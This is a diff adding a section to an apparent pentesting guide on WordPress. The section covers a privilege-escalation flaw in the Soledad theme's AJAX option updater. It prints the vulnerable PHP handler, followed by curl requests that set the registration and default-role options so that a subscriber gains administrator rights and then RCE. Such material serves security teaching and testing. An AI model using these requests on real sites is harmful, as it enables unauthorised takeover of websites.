Privilege Escalation Vulnerability in Soledad Theme Affectin...

src/network-services-pentesting/pentesting-web/wordpress.md

@@ -409,6 +409,42 @@ The `permission_callback` is a callback to function that checks if a given user
 
 Of course, Wordpress uses PHP and files inside plugins are directly accessible from the web. So, in case a plugin is exposing any vulnerable functionality that is triggered just accessing the file, it's going to be exploitable by any user.
 
+### WordPress AJAX option updaters without capability checks
+
+Themes often register authenticated `admin-ajax.php` actions that write directly to the options table via `update_option()` / `update_site_option()` based solely on untrusted POST parameters. If the handler only calls `check_ajax_referer()` (anti-CSRF) and omits capability enforcement, any Subscriber+ user that can load `/wp-admin/` can steal the nonce rendered in the dashboard and flip security-sensitive options. The Soledad theme (≤ 8.6.9) shipped the following pattern ([details](https://patchstack.com/articles/privilege-escalation-vulnerability-in-soledad-theme-affecting-50k-sites/)):
+
+```php
+public function penci_update_option() {
+    check_ajax_referer( 'ajax-nonce', 'nonce' );
+    $name = sanitize_text_field( wp_unslash( $_POST['option_name'] ) );
+    $val  = wp_unslash( $_POST['option_val'] );
+    if ( $name && $val ) {
+        update_option( $name, $val );
+        wp_send_json_success();
+    }
+}
+```
+
+**Exploitation flow (Subscriber → Administrator):**
+
+1. Authenticate as a low-privileged user and capture the nonce used by the vulnerable action from the page source or the Network tab.
+2. Send crafted AJAX requests that toggle global registration options:
+
+```bash
+curl -X POST https://victim/wp-admin/admin-ajax.php \
+  -b 'wordpress_logged_in=...' \
+  -d 'action=penci_update_option&nonce=<ajax-nonce>&option_name=users_can_register&option_val=1'
+
+curl -X POST https://victim/wp-admin/admin-ajax.php \
+  -b 'wordpress_logged_in=...' \
+  -d 'action=penci_update_option&nonce=<ajax-nonce>&option_name=default_role&option_val=administrator'
+```
+
+3. Visit `/wp-login.php?action=register` (or any exposed registration form) and create a new account — it inherits the Administrator role because `users_can_register=1` and `default_role=administrator`.
+4. Abuse admin privileges to upload/edit plugins or themes and achieve RCE.
+
+The vulnerability exists because the action trusts a nonce but never enforces `current_user_can('manage_options')`, so any logged-in role that can steal the nonce can rewrite arbitrary options and pivot to RCE.
+
 ### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
 
 Some plugins implement “trusted header” shortcuts for internal integrations or reverse proxies and then use that header to set the current user context for REST requests. If the header is not cryptographically bound to the request by an upstream component, an attacker can spoof it and hit privileged REST routes as an administrator.
@@ -931,5 +967,6 @@ Hardening
 - [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability)
 - [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability)
 - [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability)
+- [Privilege Escalation Vulnerability in Soledad Theme Affecting 50k+ Sites](https://patchstack.com/articles/privilege-escalation-vulnerability-in-soledad-theme-affecting-50k-sites/)
 
 {{#include ../../banners/hacktricks-training.md}}